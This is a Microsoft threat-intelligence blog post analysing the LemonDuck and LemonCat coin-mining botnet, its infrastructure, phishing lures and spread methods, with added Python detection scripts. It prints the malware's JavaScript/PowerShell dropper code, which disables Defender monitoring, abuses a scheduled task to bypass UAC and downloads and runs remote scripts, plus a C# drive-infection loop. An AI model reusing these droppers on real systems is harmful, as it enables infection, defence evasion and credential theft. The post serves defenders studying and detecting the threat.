LemonDuck is named after the variable “Lemon_Duck” in one of the said PowerShell scripts. The variable is often used as the user agent, in conjunction with assigned numbers, for infected devices. The format used two sets of alphabetical characters separated by dashes, for example: “User-Agent: Lemon-Duck-[A-Z]-[A-Z]”. The term still appears in PowerShell scripts, as well as in many of the execution scripts, specifically in a function called SIEX, which is used to assign a unique user-agent during botnet connection in attacks as recently as June 2021.
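The user-agent format quoted above is a convenient, low-cost detection opportunity in web proxy or egress logs. The Python below is an added example, not code from the Microsoft write-up: it compiles the quoted pattern (also accepting the underscore form of the variable name) and runs it over a handful of constructed proxy log lines. The log line layout, the IP addresses and the URLs are assumptions made for the example.

```python
import re

# Pattern taken from the format quoted in the write-up, "Lemon-Duck-[A-Z]-[A-Z]",
# widened to accept the underscore spelling of the variable name ("Lemon_Duck").
# IGNORECASE also makes the letter classes match lowercase suffixes.
LEMONDUCK_UA = re.compile(r"\bLemon[-_]Duck-[A-Z]-[A-Z]\b", re.IGNORECASE)

# Assumed proxy log layout (constructed for this example, not a real product format):
#   <timestamp> <client_ip> <method> <url> <status> "<user-agent>"
LINE_RE = re.compile(
    r'^(?P<ts>\S+) (?P<ip>\S+) (?P<method>\S+) (?P<url>\S+) '
    r'(?P<status>\d{3}) "(?P<ua>[^"]*)"$'
)

# Constructed sample lines. The last line is a deliberate near-miss: it contains
# "duck" but not the delimited "Lemon-Duck-X-Y" token, so it must not alert.
SAMPLE_LOG = """\
2021-06-14T09:12:01Z 10.20.30.41 GET http://example.invalid/api/status 200 "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
2021-06-14T09:12:07Z 10.20.30.41 GET http://cdn.example.invalid/lib.js 200 "Lemon-Duck-K-Q"
2021-06-14T09:12:09Z 10.20.30.55 POST http://intranet.example.invalid/login 302 "Mozilla/5.0 (X11; Linux x86_64)"
2021-06-14T09:12:15Z 10.20.30.77 GET http://example.invalid/a.jsp 404 "Lemon_Duck-B-M"
2021-06-14T09:12:20Z 10.20.30.41 GET http://example.invalid/pixel.gif 200 "lemonade-duck-browser/1.0"
"""


def parse_line(line):
    """Split one log line into named fields; return None for lines that do not fit."""
    match = LINE_RE.match(line)
    return match.groupdict() if match else None


def find_lemonduck_beacons(lines):
    """Return the parsed records whose user-agent carries the LemonDuck token."""
    hits = []
    for line in lines:
        record = parse_line(line)
        if record is None:
            continue  # malformed or differently formatted line; skip, do not crash
        if LEMONDUCK_UA.search(record["ua"]):
            hits.append(record)
    return hits


def beaconing_hosts(lines):
    """Distinct client IPs that produced a matching user-agent, for triage."""
    return sorted({hit["ip"] for hit in find_lemonduck_beacons(lines)})


if __name__ == "__main__":
    for hit in find_lemonduck_beacons(SAMPLE_LOG.splitlines()):
        print(f"{hit['ts']} {hit['ip']} -> {hit['url']} UA={hit['ua']!r}")
    print("hosts to triage:", beaconing_hosts(SAMPLE_LOG.splitlines()))
```

Because the token is set by the implant rather than by a browser, a match is a strong signal on its own; the near-miss line shows why the word boundaries and the literal dashes in the pattern matter for keeping false positives down.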

LemonDuck frequently utilizes open-source material built off of resources also used by other botnets, so there are many components of this threat that would seem familiar. Microsoft researchers are aware of two distinct operating structures, which both use the LemonDuck malware but are potentially operated by two different entities for separate goals.

The first, which we call the “Duck” infrastructure, uses historical infrastructures discussed in this report. It is highly consistent in running campaigns and performs limited follow-on activities. This infrastructure is seldom seen in conjunction with edge device compromise as an infection method, and is more likely to have random display names for its C2 sites, and is always observed utilizing “Lemon_Duck” explicitly in script.

The second infrastructure, which we call “Cat” infrastructure—for primarily using two domains with the word “cat” in them (sqlnetcat[.]com, netcatkit[.]com)—emerged in January 2021. It was used in attacks exploiting vulnerabilities in Microsoft Exchange Server. Today, the Cat infrastructure is used in attacks that typically result in backdoor installation, credential and data theft, and malware delivery. It is often seen delivering the malware Ramnit.

Sample Duck domains
  • cdnimages[.]xyz
  • bb3u9[.]com
  • zz3r0[.]com
  • pp6r1[.]com
  • amynx[.]com
  • ackng[.]com
  • hwqloan[.]com
  • js88[.]ag
  • zer9g[.]com
  • b69kq[.]com

Sample Cat domains
  • sqlnetcat[.]com
  • netcatkit[.]com
  • down[.]sqlnetcat[.]com

The Duck and Cat infrastructures use similar subdomains, and they use the same task names, such as “blackball”. Both infrastructures also utilize the same packaged components hosted on similar or identical sites for their mining, lateral movement, and competition-removal scripts, as well as many of the same function calls.

The fact that the Cat infrastructure is used for more dangerous campaigns does not deprioritize malware infections from the Duck infrastructure. Instead, this intelligence adds important context for understanding this threat: the same set of tools, access, and methods can be re-used at dynamic intervals, to greater impact. Despite common implications that cryptocurrency miners are less threatening than other malware, their core functionality mirrors non-monetized software, making any botnet infection worthy of prioritization.

Figure 2. LemonDuck attack chain from the Duck and Cat infrastructures

Initial access

LemonDuck spreads in a variety of ways, but the two main methods are (1) compromises that are either edge-initiated or facilitated by bot implants moving laterally within an organization, or (2) bot-initiated email campaigns.

LemonDuck acts as a loader for many other follow-on activities, but one of its main functions is to spread by compromising other systems. Since its first appearance, the LemonDuck operators have leveraged scans against both Windows and Linux devices for open or weakly authenticated SMB, Exchange, SQL, Hadoop, REDIS, RDP, or other edge devices that might be vulnerable to password spray or application vulnerabilities like CVE-2017-0144 (EternalBlue), CVE-2017-8464 (LNK RCE), CVE-2019-0708 (BlueKeep), CVE-2020-0796 (SMBGhost), CVE-2021-26855 (ProxyLogon), CVE-2021-26857 (ProxyLogon), CVE-2021-26858 (ProxyLogon), and CVE-2021-27065 (ProxyLogon).

Once inside a system with an Outlook mailbox, as part of its normal exploitation behavior, LemonDuck attempts to run a script that utilizes the credentials present on the device. The script instructs the mailbox to send copies of a phishing message with preset messages and attachments to all contacts.

Because of this method of contact messaging, security controls that rely on determining if an email is sent from a suspicious sender don’t apply. This means that email security policies that reduce scanning or coverage for internal mail need to be re-evaluated, as sending emails through contact scraping is very effective at bypassing email controls.

From mid-2020 to March 2021, LemonDuck’s email subjects and body content have remained static, as have the attachment names and formats. These attachment names and formats have changed very little from similar campaigns that occurred in early 2020.

Sample email subjects and body content
  • The Truth of COVID-19
  • COVID-19 nCov Special info WHO
  • WTF
  • What the fcuk
  • good bye
  • farewell letter
  • broken file
  • This is your order?
  • Virus actually comes from United States of America
  • very important infomation for Covid-19
  • see attached document for your action and discretion.
  • the outbreak of CORONA VIRUS is cause of concern especially where forign personal have recently arrived or will be arriving at various intt in near future.
  • what’s wrong with you?are you out of your mind!!!!!
  • are you out of your mind!!!!!what ‘s wrong with you?
  • good bye, keep in touch
  • can you help me to fix the file,i can’t read it
  • file is brokened, i can’t open it

The attachment used for these lures is one of three types: .doc, .js, or a .zip containing a .js file. Whatever the type, the file is named “readme”. Occasionally, all three types are present in the same email.
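The two observations above, that the lures arrive from a trusted internal mailbox and that the attachment is always a "readme" file of one of three types, translate directly into a mail-triage rule. The Python below is an added example, not code from the Microsoft write-up or from any Microsoft product: it parses raw RFC 5322 messages with the standard library, matches the subject against the lure list from this post and the attachment names against the readme pattern, and records whether the sender is internal without letting that lower the verdict. The internal domain, the sender addresses and the message contents are constructed for the example.

```python
import re
from email import message_from_bytes, policy
from email.message import EmailMessage

# Assumed to be the organisation's own domain (placeholder for the example).
INTERNAL_DOMAIN = "example.invalid"

# Lure subjects listed in the write-up, normalised to lowercase for matching.
LURE_SUBJECTS = {
    "the truth of covid-19", "covid-19 ncov special info who", "wtf",
    "what the fcuk", "good bye", "farewell letter", "broken file",
    "this is your order?", "virus actually comes from united states of america",
    "very important infomation for covid-19",
}

# Attachment naming described in the write-up: "readme" as .doc, .js, or .zip (wrapping a .js).
README_RE = re.compile(r"^readme\.(doc|js|zip)$", re.IGNORECASE)


def _norm(text):
    """Lowercase and collapse whitespace so trivial subject variations still match."""
    return re.sub(r"\s+", " ", (text or "").strip().lower())


def triage_message(raw):
    """Parse one raw message and return a verdict plus the reasons behind it."""
    msg = message_from_bytes(raw, policy=policy.default)
    subject = str(msg.get("Subject", ""))
    sender = str(msg.get("From", ""))
    names = [part.get_filename() or "" for part in msg.iter_attachments()]

    reasons = []
    if _norm(subject) in LURE_SUBJECTS:
        reasons.append("known-lure-subject")
    if any(README_RE.match(name) for name in names):
        reasons.append("readme-attachment")

    # The attachment is the delivery vehicle, so it drives the verdict; a lure
    # subject alone is weak evidence because "good bye" is also a normal subject.
    if "readme-attachment" in reasons and "known-lure-subject" in reasons:
        verdict = "high"
    elif "readme-attachment" in reasons:
        verdict = "medium"
    elif reasons:
        verdict = "low"
    else:
        verdict = "clean"

    return {
        "from": sender,
        # Recorded for the analyst but deliberately not used to reduce the verdict:
        # the botnet sends from compromised internal mailboxes to their contacts.
        "internal_sender": sender.lower().endswith("@" + INTERNAL_DOMAIN),
        "subject": subject,
        "attachments": names,
        "reasons": reasons,
        "verdict": verdict,
    }


def _build(sender, recipient, subject, body, attachments):
    """Assemble a constructed test message and return it as raw bytes."""
    msg = EmailMessage()
    msg["From"] = sender
    msg["To"] = recipient
    msg["Subject"] = subject
    msg.set_content(body)
    for name, data in attachments:
        msg.add_attachment(data, maintype="application", subtype="octet-stream", filename=name)
    return msg.as_bytes()


# Constructed samples (not real captures); attachment bodies are inert placeholders.
SAMPLE_MESSAGES = {
    "lure_from_colleague": _build("alice@example.invalid", "bob@example.invalid",
                                  "The Truth of COVID-19",
                                  "see attached document for your action and discretion.",
                                  [("readme.zip", b"PK-placeholder"), ("readme.js", b"// placeholder")]),
    "readme_only": _build("carol@example.invalid", "bob@example.invalid", "Status report",
                          "Please review.", [("README.doc", b"placeholder")]),
    "subject_only": _build("dave@partner.invalid", "bob@example.invalid", "good bye",
                           "Thanks for everything.", []),
    "benign": _build("erin@example.invalid", "bob@example.invalid", "Q3 budget",
                     "Numbers attached.", [("budget.xlsx", b"placeholder")]),
}


def triage_all(samples=SAMPLE_MESSAGES):
    """Return {sample name: verdict} for a batch of raw messages."""
    return {name: triage_message(raw)["verdict"] for name, raw in samples.items()}


if __name__ == "__main__":
    for name, raw in SAMPLE_MESSAGES.items():
        result = triage_message(raw)
        print(f"{name:20} {result['verdict']:7} internal={result['internal_sender']} {result['reasons']}")
```

The first sample is the case the post warns about: an internal sender, a known lure subject, and the readme attachments together score "high" even though an allow-list keyed on sender domain would have passed it. A "medium" on the readme attachment alone keeps the rule useful once the operators rotate subjects, which the post notes they did little of between mid-2020 and March 2021.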

Figure 3. Sample email

While the JavaScript is detected by many security vendors, it might be classified with generic detection names. It could be valuable for organizations to sanitize JavaScript or VBScript executing or calling prompts (such as PowerShell) directly from mail downloads through solutions such as custom detection rules.

Since LemonDuck began operating, the .zip to .js file execution method has been the most common. The JavaScript has replaced the scheduled task that LemonDuck previously used to kickstart the PowerShell script. This PowerShell script has looked very similar throughout 2020 and 2021, with minor changes depending on the version, indicating continued development. Below is a comparison of changes from the most recent iterations of the email-delivered downloads and those from April of 2020.

April 2020 PowerShell script:
var cmd =new ActiveXObject("WScript.Shell");var cmdstr="cmd /c start /b notepad "+WScript.ScriptFullName+" & powershell -w hidden -c "if([Environment]::OSVersion.version.Major -eq '10'){Set-ItemProperty -Path 'HKCU:Environment' -Name 'windir' -Value 'cmd /c powershell -w hidden Set-MpPreference -DisableRealtimeMonitoring 1 & powershell -w hidden IEx(New-Object Net.WebClient).DownLoadString(''*%username%*%computername%''+[Environment]::OSVersion.version.Major) &::';sleep 1;schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I;Remove-ItemProperty -Path 'HKCU:Environment' -Name 'windir' -Force}else{IEx(ne`w-obj`ect Net.WebC`lient).DownloadString('');bpu -method migwiz -Payload 'powershell -w hidden IEx(New-Object Net.WebClient).DownLoadString(''*%username%*%computername%''+[Environment]::OSVersion.version.Majo
//This File is broken.

March 2021 PowerShell script:
var cmd =new ActiveXObject("WScript.Shell");var cmdstr="cmd /c start /b notepad "+WScript.ScriptFullName+" & powershell -w hidden IE`x(Ne`w-Obj`ect Net.WebC`lient).DownLoadString('http://t.z'+'*mail_js*%username%*%computername%*'+[Environment]::OSVersion.version.Major);bpu ('http://t.z'+'')";,0,1);
//This File is broken.

After the emails are sent, the inbox is cleaned to remove traces of these mails. This method of self-spreading is attempted on any affected device that has a mailbox, regardless of whether it is an Exchange server.

Other common methods of infection include movement within the compromised environment, as well as through USB and connected drives. These processes are often kicked off automatically and have occurred consistently throughout the entirety of LemonDuck’s operation.

These methods run as a series of C# scripts that gather available drives for infection. They also create a running list of drives that are already infected based on whether the script finds the threat already installed. Once checked against the running list of infected drives, these scripts attempt to create a set of hidden files in the home directory, including a copy of readme.js. Any device that has been affected by the LemonDuck implants at any time could have had any number of drives attached to it that are compromised in this manner. This makes this behavior a possible entry vector for additional attacks.

DriveInfo[] drives = DriveInfo.GetDrives();
foreach (DriveInfo drive in drives)
    if (blacklist.Contains(drive.Name))
    { continue;}
    Console.WriteLine("Detect drive:"+drive.Name);
    if (IsSupported(drive))
        if (!File.Exists(drive + home + inf_data))
            Console.WriteLine("Try to infect "+drive.Name);
            if (CreateHomeDirectory(drive.Name) && Infect(drive.Name))
        else {
            Console.WriteLine(drive.Name+" already infected!");

Comprehensive protection against a wide-ranging malware operation

The cross-domain visibility and coordinated defense delivered by Microsoft 365 Defender is designed for the wide range and increasing sophistication of threats that LemonDuck exemplifies. Microsoft 365 Defender has AI-powered industry-leading protections that can stop multi-component threats like LemonDuck across domains and across platforms. Microsoft 365 Defender for Office 365 detects the malicious emails sent by the LemonDuck botnet to deliver malware payloads as well as spread the bot loader. Microsoft Defender for Endpoint detects and blocks LemonDuck implants, payloads, and malicious activity on Linux and Windows.

More importantly, Microsoft 365 Defender provides rich investigation tools that can expose detections of LemonDuck activity, including attempts to compromise and gain a foothold on the network, so security operations teams can efficiently and confidently respond to and resolve these attacks. Microsoft 365 Defender correlates cross-platform, cross-domain signals to paint the end-to-end attack chain, allowing organizations to see the full impact of an attack. We also published a threat analytics article on this threat. Microsoft 365 Defender customers can use this report to get important technical details, guidance for investigation, consolidated incidents, and steps to mitigate this threat in particular and modern cyberattacks in general.

In Part 2 of this blog series, we’ll share our in-depth technical analysis of the malicious actions that follow a LemonDuck infection. These include general, automatic behavior as well as human-initialized behavior. We will also provide guidance for investigating LemonDuck attacks, as well as mitigation recommendations for strengthening defenses against these attacks.


Microsoft 365 Defender Threat Intelligence Team

The post When coin miners evolve, Part 1: Exposing LemonDuck and LemonCat, modern mining malware infrastructure appeared first on Microsoft Security Blog.

Posted in Skype for Business